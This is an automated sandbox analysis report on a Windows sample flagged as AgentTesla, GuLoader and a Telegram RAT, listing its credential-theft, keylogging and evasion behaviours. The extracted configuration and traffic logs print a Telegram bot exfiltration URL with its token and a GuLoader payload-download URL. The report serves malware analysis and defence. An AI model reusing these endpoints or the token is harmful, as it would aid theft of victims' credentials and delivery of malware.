Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	623387
MD5:	2beb53482de8f6a713deb6fa9f9e7267
SHA1:	0959ea9b1697d980da699f8375f91ca1df8e0f56
SHA256:	7ac7845621113c87e927eb2b582af6f1809e4866e4ee0f089dd1c6ab0042dd27
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AgentTesla

Antivirus detection for URL or domain

Yara detected GuLoader

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Multi AV Scanner detection for domain / URL

Tries to steal Mail credentials (via file / registry access)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Hides threads from debuggers

Installs a global keyboard hook

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

C2 URLs / IPs found in malware configuration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Sample file is different than original file name gathered from version info

Creates a window with clipboard capturing capabilities

PE / OLE file has an invalid certificate

Contains functionality to enumerate device drivers

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

file.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2BEB53482DE8F6A713DEB6FA9F9E7267)

CasPol.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 5720 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 8436 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 8960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "765471673", "Chat URL": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument"}

Threatname: GuLoader

{"Payload URL": "https://msdvc.com/oluwa_RcQBQnZSyJ230.bin"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendMessage"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000006.00000000.4202992291.0000000000D50000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: CasPol.exe PID: 8436	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 8436	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 8436	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

HTTP traffic detected: POST /bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3291ed28542fHost: api.telegram.orgContent-Length: 1026Expect: 100-continueConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /oluwa_RcQBQnZSyJ230.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: msdvc.comCache-Control: no-cache

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://VrxAgw.com
Source: CasPol.exe, 00000006.00000002.9109123482.000000001D620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000006.00000003.5392755062.000000000109B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9085023416.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: CasPol.exe, 00000006.00000003.5392755062.000000000109B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9085023416.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: file.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%t-
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000006.00000002.9084920073.0000000001092000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.5392527483.0000000001092000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocumentdocument-----
Source: CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.4395944498.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9108808385.000000001D606000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d1ktMAcOA2o.net
Source: CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d1ktMAcOA2o.nett-
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://msdvc.com/
Source: CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://msdvc.com/j
Source: CasPol.exe, 00000006.00000003.5393803213.000000000106A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://msdvc.com/oluwa_RcQBQnZSyJ230.bin
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: msdvc.com

Source: global traffic

HTTP traffic detected: GET /oluwa_RcQBQnZSyJ230.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: msdvc.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000006.00000002.9107606876.000000001D521000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C

Source: unknown

Source: unknown	HTTPS traffic detected: 119.18.54.23:443 -> 192.168.11.20:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49749 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004056A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00406BFE	1_2_00406BFE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_70AC1BFF	1_2_70AC1BFF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BB61C	1_2_033BB61C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AFAFD	1_2_033AFAFD
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AEDE0	1_2_033AEDE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BCC1C	1_2_033BCC1C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B573A	1_2_033B573A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AFF06	1_2_033AFF06
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BDB04	1_2_033BDB04
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B175E	1_2_033B175E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BF35C	1_2_033BF35C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B1356	1_2_033B1356
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B2F4A	1_2_033B2F4A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B2BBE	1_2_033B2BBE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B2B8D	1_2_033B2B8D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B138C	1_2_033B138C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BCB81	1_2_033BCB81
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5BFF	1_2_033B5BFF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B53CE	1_2_033B53CE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B57C6	1_2_033B57C6
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AEE3E	1_2_033AEE3E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B1632	1_2_033B1632
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B562F	1_2_033B562F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B2E62	1_2_033B2E62
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B12AA	1_2_033B12AA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B629A	1_2_033B629A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B568A	1_2_033B568A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AFE86	1_2_033AFE86
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B22FB	1_2_033B22FB
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B4EE7	1_2_033B4EE7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B591F	1_2_033B591F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B2D7E	1_2_033B2D7E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B156E	1_2_033B156E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AFD46	1_2_033AFD46
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B61A9	1_2_033B61A9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B2DFC	1_2_033B2DFC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AFDEE	1_2_033AFDEE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B61CF	1_2_033B61CF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AFC1E	1_2_033AFC1E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B1412	1_2_033B1412
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B1815	1_2_033B1815
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B5876	1_2_033B5876
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BE04B	1_2_033BE04B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033AFC91	1_2_033AFC91
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B2CFE	1_2_033B2CFE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BD0E8	1_2_033BD0E8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B50E8	1_2_033B50E8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033B14C3	1_2_033B14C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1D2A9890	6_2_1D2A9890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1D2A6B63	6_2_1D2A6B63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1D2AA160	6_2_1D2AA160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1D2A9548	6_2_1D2A9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1FCEBFA8	6_2_1FCEBFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1FCEF548	6_2_1FCEF548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1FCE3D88	6_2_1FCE3D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_1FCEC528	6_2_1FCEC528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_20630040	6_2_20630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2063BEF0	6_2_2063BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_20638BE8	6_2_20638BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_206337A0	6_2_206337A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_206364B0	6_2_206364B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2063D508	6_2_2063D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_20632320	6_2_20632320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2063373F	6_2_2063373F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_20703018	6_2_20703018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2070AD36	6_2_2070AD36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_207055F8	6_2_207055F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_207005A9	6_2_207005A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2070DED0	6_2_2070DED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2070EF70	6_2_2070EF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2070CF20	6_2_2070CF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_207054F8	6_2_207054F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_2070D2C0	6_2_2070D2C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process Stats: CPU usage > 98%

Source: file.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\file.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: file.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004034F7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 1D2AD148 appears 53 times

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BCC1C NtAllocateVirtualMemory,		1_2_033BCC1C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_033BE873 NtProtectVirtualMemory,		1_2_033BE873

Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameConfigXML_ScenarioProfile.dllT vs file.exe
Source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpCom.dllj% vs file.exe

Source: file.exe

Static PE information: invalid certificate

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/7@2/2

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: file.exe	Virustotal: Detection: 26%
Source: file.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

